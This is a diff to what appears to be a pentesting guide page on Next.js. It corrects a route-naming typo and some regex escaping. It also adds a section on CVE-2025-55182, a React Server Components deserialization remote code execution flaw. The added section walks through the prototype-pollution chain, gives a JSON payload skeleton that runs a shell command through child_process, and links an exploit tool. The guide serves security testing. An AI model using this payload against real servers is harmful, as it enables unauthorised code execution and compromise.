diff --git a/src/network-services-pentesting/pentesting-web/nextjs.md b/src/network-services-pentesting/pentesting-web/nextjs.md index d55b9806754..41f7c10a428 100644 --- a/src/network-services-pentesting/pentesting-web/nextjs.md +++ b/src/network-services-pentesting/pentesting-web/nextjs.md @@ -268,7 +268,7 @@ Catch-all routes handle multiple nested segments or unknown paths, providing fle ```arduino my-nextjs-app/ ├── app/ -│ ├── [..slug]/ +│ ├── [...slug]/ │ │ └── page.tsx │ ├── layout.tsx │ └── page.tsx @@ -1285,10 +1285,10 @@ Search downloaded JS chunks for `createServerReference` and extract the hash and ```regex # Strict pattern for standard minification -createServerReference\)\"([a-f0-9]{40,})\",\w+\.callServer,void 0,\w+\.findSourceMapURL,\"([^\"]+)\"\) +createServerReference\)"([a-f0-9]{40,})",\w+\.callServer,void 0,\w+\.findSourceMapURL,"([^"]+)"\) # Flexible pattern handling various minification styles -createServerReference[^\"]*\"([a-f0-9]{40,})\"[^\"]*\"([^\"]+)\"\s*\) +createServerReference[^\"]*"([a-f0-9]{40,})"[^\"]*"([^"]+)"\s*\) ``` - Group 1: server action hash (40+ hex chars) @@ -1332,9 +1332,40 @@ Replay in Repeater and test authorization, input validation and business logic o - Requires `productionBrowserSourceMaps` enabled in production to recover names from bundles/source maps. - Function-name disclosure is not a vulnerability by itself; use it to guide discovery and test each action’s authorization. +### React Server Components Flight protocol deserialization RCE (CVE-2025-55182) + +Next.js App Router deployments that expose Server Actions on `react-server-dom-webpack` **19.0.0–19.2.0 (Next.js 15.x/16.x)** contain a critical server-side prototype pollution during **Flight** chunk deserialization. By crafting `$` references inside a Flight payload an attacker can pivot from polluted prototypes to arbitrary JavaScript execution and then to OS command execution inside the Node.js process. + +{{#ref}} +../../pentesting-web/deserialization/nodejs-proto-prototype-pollution/README.md +{{#endref}} + +#### Attack chain in Flight chunks + +1. **Prototype pollution primitive:** Set `"then": "$1:__proto__:then"` so that the resolver writes a `then` function on `Object.prototype`. Any plain object processed afterwards becomes a thenable, letting the attacker influence async control flow inside RSC internals. +2. **Rebinding to the global `Function` constructor:** Point `_response._formData.get` at `"$1:constructor:constructor"`. During resolution, `object.constructor` → `Object`, and `Object.constructor` → `Function`, so future calls to `_formData.get()` actually execute `Function(...)`. +3. **Code execution via `_prefix`:** Place JavaScript source in `_response._prefix`. When the polluted `_formData.get` is invoked, the framework evaluates `Function(_prefix)(...)`, so the injected JS can run `require('child_process').exec()` or any other Node primitive. + +#### Payload skeleton + +```json +{ + "then": "$1:__proto__:then", + "status": "resolved_model", + "reason": -1, + "value": "{\"then\":\"$B1337\"}", + "_response": { + "_prefix": "require('child_process').exec('id')", + "_chunks": "$Q2", + "_formData": { "get": "$1:constructor:constructor" } + } +} +``` + ## References - [Pentesting Next.js Server Actions — A Burp Extension for Hash-to-Function Mapping](https://www.adversis.io/blogs/pentesting-next-js-server-actions) - [NextjsServerActionAnalyzer (Burp extension)](https://github.com/Adversis/NextjsServerActionAnalyzer) +- [CVE-2025-55182 React Server Components Remote Code Execution Exploit Tool](https://github.com/Spritualkb/CVE-2025-55182-exp) -{{#include ../../banners/hacktricks-training.md}} \ No newline at end of file +{{#include ../../banners/hacktricks-training.md}}